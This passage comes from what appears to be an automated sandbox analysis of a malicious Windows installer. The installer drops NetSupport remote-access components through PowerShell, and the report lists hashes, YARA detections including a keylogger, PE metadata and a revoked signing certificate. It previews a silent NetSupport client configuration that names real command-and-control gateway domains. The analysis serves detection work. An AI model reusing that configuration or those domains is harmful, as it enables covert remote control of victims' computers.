Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll, Author: Joe Security
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328056
                                                                                                                                                                                                  Entropy (8bit):6.754723001562745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                                                                                                  MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                                                                                                  SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                                                                                                  SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                                                                                                  SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):259
                                                                                                                                                                                                  Entropy (8bit):5.103526864179364
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
                                                                                                                                                                                                  MD5:866C96BA2823AC5FE70130DFAAA08531
                                                                                                                                                                                                  SHA1:892A656DA1EA264C73082DA8C6E5F5728ABCB861
                                                                                                                                                                                                  SHA-256:6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
                                                                                                                                                                                                  SHA-512:0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18808
                                                                                                                                                                                                  Entropy (8bit):6.22028391196942
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                                                                                                  MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                                                                                                  SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                                                                                                  SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                                                                                                  SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3642864
                                                                                                                                                                                                  Entropy (8bit):6.5156874906689275
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
                                                                                                                                                                                                  MD5:214A714EF11C2C91162A9344BF8F2E50
                                                                                                                                                                                                  SHA1:B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
                                                                                                                                                                                                  SHA-256:74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
                                                                                                                                                                                                  SHA-512:A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):459760
                                                                                                                                                                                                  Entropy (8bit):6.678291257338415
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
                                                                                                                                                                                                  MD5:69F72AD2DAD99FF0FBC7F2C671523014
                                                                                                                                                                                                  SHA1:8AAAB0955014B89CA794A51DD527D3AFE6F38A94
                                                                                                                                                                                                  SHA-256:23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
                                                                                                                                                                                                  SHA-512:EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):121304
                                                                                                                                                                                                  Entropy (8bit):6.150456878585649
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
                                                                                                                                                                                                  MD5:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  SHA1:E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
                                                                                                                                                                                                  SHA-256:AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
                                                                                                                                                                                                  SHA-512:4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, Author: Joe Security
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):638
                                                                                                                                                                                                  Entropy (8bit):5.396410176198281
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
                                                                                                                                                                                                  MD5:74BEF725496CD35EEB6F6B94E1EDDDFD
                                                                                                                                                                                                  SHA1:616AB761A1429E982062009B5C319F796A60BA1B
                                                                                                                                                                                                  SHA-256:8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
                                                                                                                                                                                                  SHA-512:C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=*....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):773968
                                                                                                                                                                                                  Entropy (8bit):6.901559811406837
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                                                                  MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                                                                  SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                                                                  SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                                                                  SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                  Entropy (8bit):4.93007757242403
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                                                                  MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                                                                  SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                                                                  SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                                                                  SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):46
                                                                                                                                                                                                  Entropy (8bit):4.532048032699691
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                                                                                  MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                                                                                  SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                                                                                                  SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                                                                                  SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33144
                                                                                                                                                                                                  Entropy (8bit):6.737780491933496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                                                                                                  MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                                                                                                  SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                                                                                                  SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                                                                                                  SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll, Author: Joe Security
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):72584
                                                                                                                                                                                                  Entropy (8bit):6.671736046146569
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
                                                                                                                                                                                                  MD5:2A2FC166269EFE48D61CB1AB92215DC2
                                                                                                                                                                                                  SHA1:A5679174D941919BAF764F94640994C01D695625
                                                                                                                                                                                                  SHA-256:73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
                                                                                                                                                                                                  SHA-512:13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L......^.....................J.......!............@.......................... ............@....................................<.......T................K..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2275903
                                                                                                                                                                                                  Entropy (8bit):7.997003172118591
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
                                                                                                                                                                                                  MD5:C56A7DCC8C1658FA154501AC0819BA7E
                                                                                                                                                                                                  SHA1:DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
                                                                                                                                                                                                  SHA-256:D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
                                                                                                                                                                                                  SHA-512:AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:PK.........0.6........H..... .nskbfltr.infUT...t..F...gt..Fux.............U....@......A<n..<IO+.(Eh...E.NF...dF.o..Z...B......p...3RlRBU....W..$....4l.. .!...QY. ^..m.%......SL......9.w.R.tv*....%.}..j..)...........0..F......V1.B6..y.WU...$..M....B1;~...&.)~...I....?.g..*_..R..PK.........H...PK...........W.............. .NSM.LICUT...l}.dl}.dl}.dux.............-..NB1...........]..(7..C...%,.n.....3....6_Sm.......w^..'...=......e.x.f+$dW. .I.=.{y#.|.....C.....tL.q.....hL>Q...D.j..8..W+ ..5\.....v.|^...../7...X.V...b...9...X@A.....f.:....Fx.@..7.......U.~.PK....k%........PK........S..<.............. .nsm_vpro.iniUT...n:.K...gn:.Kux..............v.........../JLO.w.KL.IM.5..rIM*M..I-K..qy..PK..I...-.......PK........bo.H........x..... .pcicapi.dllUT...x. W...gx. Wux...............\SG.8|.a@ (.D..E1...$,B.[.@.\A.`@..D..*1F.K..P...m.u_*.hk....Z..j...TQ.|..MX.>.............3s.....7....bQ..d.Q.......5@r.....}........2.........~ZJnn........\~...?'/].....k.q....{.Us.
                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):7.992821509941649
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                                                                                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                  File name:KC0uZWwr8p.exe
                                                                                                                                                                                                  File size:21'424'072 bytes
                                                                                                                                                                                                  MD5:3c387c0db035c0c3185d6fbd1ab46bd1
                                                                                                                                                                                                  SHA1:7b6e6212a6d13800282bd2cb362c2a311d89e543
                                                                                                                                                                                                  SHA256:a1720d68eef7dc381a533fd8584a227db3dbcaed16098a0d7f31077f95355e8c
                                                                                                                                                                                                  SHA512:a6e431c98cafaf3762d5d1d60ab337d4a002c0dd90ae830d6b513c97e333adc3bdf8ce70ad65d6149878fb48d94b762902038d44909b662603c6082997071e76
                                                                                                                                                                                                  SSDEEP:393216:xrjU2t/X9E3JMUNccjPql0NbgVunl22V5v+8gDRmffwuvO:tjU2p9EZvNdjP6Kbaunldv+8ORmXwu2
                                                                                                                                                                                                  TLSH:07273373B787A43EF09E1B3B15B2A16844FBA6116923AE1385F484BCCF650501E7F71A
                                                                                                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                  Icon Hash:af4f59b4f071970c
                                                                                                                                                                                                  Entrypoint:0x4a83bc
                                                                                                                                                                                                  Entrypoint Section:.itext
                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 1
File Version Major: 6
File Version Minor: 1
Subsystem Version Major: 6
Subsystem Version Minor: 1
Import Hash: 40ab50289f7ef5fae60801f88d4541fc
Signature Valid: false
Signature Issuer: CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error: A certificate was explicitly revoked by its issuer
Error Number: -2146762484
Not Before | Not After
26/09/2024 07:47:26 | 27/09/2025 07:47:26
Subject Chain
• E=makedasalzbergneu79@gmail.com, CN=OMICARE JOINT STOCK COMPANY, O=OMICARE JOINT STOCK COMPANY, L=Ha Noi, S=Ha Noi, C=VN, OID.1.3.6.1.4.1.311.60.2.1.2=Ha Noi, OID.1.3.6.1.4.1.311.60.2.1.3=VN, SERIALNUMBER=0108523661, OID.2.5.4.15=Private Organization
Version: 3
Thumbprint MD5: 92142F58BB541C3BD5CD828C76AE0FC4
Thumbprint SHA-1: 56FC98490B4845072947536B9E0AC121A37744E6
Thumbprint SHA-256: CF7A5967658B1BDB4A50A13D22EF734C707876B01D8D4B1F94FA493C5D4F3F57
Serial: 7F07AA1BB8A3B0183893B1AA
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007F719CCC81A5h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007F719CD59B2Bh
call 00007F719CD5967Eh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F719CD54358h
mov edx, dword ptr [ebp-14h]
mov eax, 004B41F4h
call 00007F719CCC2253h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B41F4h]
mov dl, 01h
mov eax, dword ptr [0049CD14h]
call 00007F719CD55683h
mov dword ptr [004B41F8h], eax
xor edx, edx
push ebp
push 004A8A27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F719CD59BB3h
mov dword ptr [004B4200h], eax
mov eax, dword ptr [004B4200h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F719CD6089Ah
mov eax, dword ptr [004B4200h]
mov edx, 00000028h
call 00007F719CD55F78h
mov edx, dword ptr [004B4200h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x992c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x146be88 | 0x2940 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xcb000 | 0x992c | 0x9a00 | a96400d0405eea27a4090faf59bfb3d4 | False | 0.3461596996753247 | data | 5.199307267733568 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcb5b8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5472972972972973
